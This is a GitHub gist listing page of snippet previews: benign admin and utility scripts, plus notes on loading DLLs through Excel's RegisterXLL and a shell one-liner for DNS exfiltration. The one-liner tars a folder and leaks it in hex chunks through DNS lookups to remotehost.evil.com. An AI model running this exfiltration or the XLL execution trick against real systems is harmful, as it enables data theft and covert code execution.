Skip to content

Instantly share code, notes, and snippets.

The standard Lorem Ipsum passage, used since the 1500s
q
"Lorem ipsum dolor sit amet, consectetur adipiscing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.
Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris
nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in
reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident,
sunt in culpa qui officia deserunt mollit anim id est laborum. 378492kasd5932fajkl124908pp "
a
98424835fc7726fa691cde0a944e80d272cac64505439a8d
a
@trolldbois
trolldbois / clean-hyperV-ghost-netadapters.ps1
Created September 3, 2020 14:26
Powershell to cleanup the ghost virtual NetAdapters created for HyperV
$adapterName = "Hyper-V Virtual Ethernet Adapter"
$badAdapters = Get-NetAdapter | ? {$_.InterfaceDescription.StartsWith($adapterName) -and $_.Status -ne "Up"}
$badAdaptersName = $badAdapters | select -ExpandProperty InterfaceDescription
$badGUID = Get-WmiObject win32_networkadapter -Property guid,Name | ? {$badAdaptersName.Contains($_.Name)} | select -ExpandProperty GUID
foreach ($GUID in $badGUID) {
Write-Host "Removing $GUID" -ForegroundColor Cyan
$RemoveKey = "HKLM:\SYSTEM\ControlSet001\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\$GUID"
# Get-Item $RemoveKey | GCI
Remove-Item -Recurse $RemoveKey
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns:tns="https://www.algosec.com/afa-ws" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns="http://schemas.xmlsoap.org/wsdl/" name="FirewallAnalyzerWebService" targetNamespace="https://www.algosec.com/afa-ws">
<!-- TYPES -->
<types>
<xsd:schema xmlns:tns="https://www.algosec.com/afa-ws" xmlns:xsd="http://www.w3.org/2001/XMLSchema" version="1.0" targetNamespace="https://www.algosec.com/afa-ws">
<xsd:import namespace="http://schemas.xmlsoap.org/soap/encoding/"/>
<!-- Groups -->
<xsd:complexType name="Groups">
<xsd:sequence>
<xsd:element name="GroupsID" type="xsd:string" minOccurs="0" maxOccurs="unbounded" />
import ctypeslib
from ctypeslib.codegen import clangparser
from ctypeslib.codegen import codegenerator
def gen_python_bindings(outdir, path):
# TODO: Make it configurable
clang_opts = ["-I/usr/local/include/libr/", "-I/usr/local/include/"]
#
pyout = StringIO()
fname = os.path.splitext(os.path.basename(path))[0]
@trolldbois
trolldbois / google-sheets-json.py
Created August 2, 2017 23:39 — forked from nickjevershed/google-sheets-json.py
Python script to convert Google spreadsheets to simple JSON file and save it locally. Assumes your data is on the left-most sheet, ie the default. Spreadsheet needs to be 'published to the web'.
import simplejson as json
import requests
#your spreadsheet key here. I'm using an example from the Victorian election campaign
key = "1THJ6MgfEk-1egiPFeDuvs4qEi02xTpz4fq9RtO7GijQ"
#google api request urls - I'm doing the first one just to get nice key values (there's probably a better way to do this)
url1 = "https://spreadsheets.google.com/feeds/cells/" + key + "/od6/public/values?alt=json"
@trolldbois
trolldbois / ExcelXLL.md
Created July 24, 2017 17:47 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@trolldbois
trolldbois / gist:7797357
Created December 4, 2013 23:15
DNS exfiltration
http://wiki.skullsecurity.org/Dnscat
http://theworldsoldestintern.wordpress.com/2012/11/30/dns-exfiltration-udp-53-indicators-of-exfiltration-udp53ioe/
https://github.com/bigsnarfdude/DFTP
http://blog.commandlinekungfu.com/2012/01/episode-164-exfiltration-nation.html
#!/usr/bin/ruby
#
# pass a domain (minus the tld) on cli to exclude from the output
#
require 'socket'
class UDPServer
def initialize(port)
@trolldbois
trolldbois / gist:7797236
Created December 4, 2013 23:04
DNS exfiltration by Shell oneliner
#from http://scilspace.com/content/data-exfiltration-over-dns
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.evil.com; done)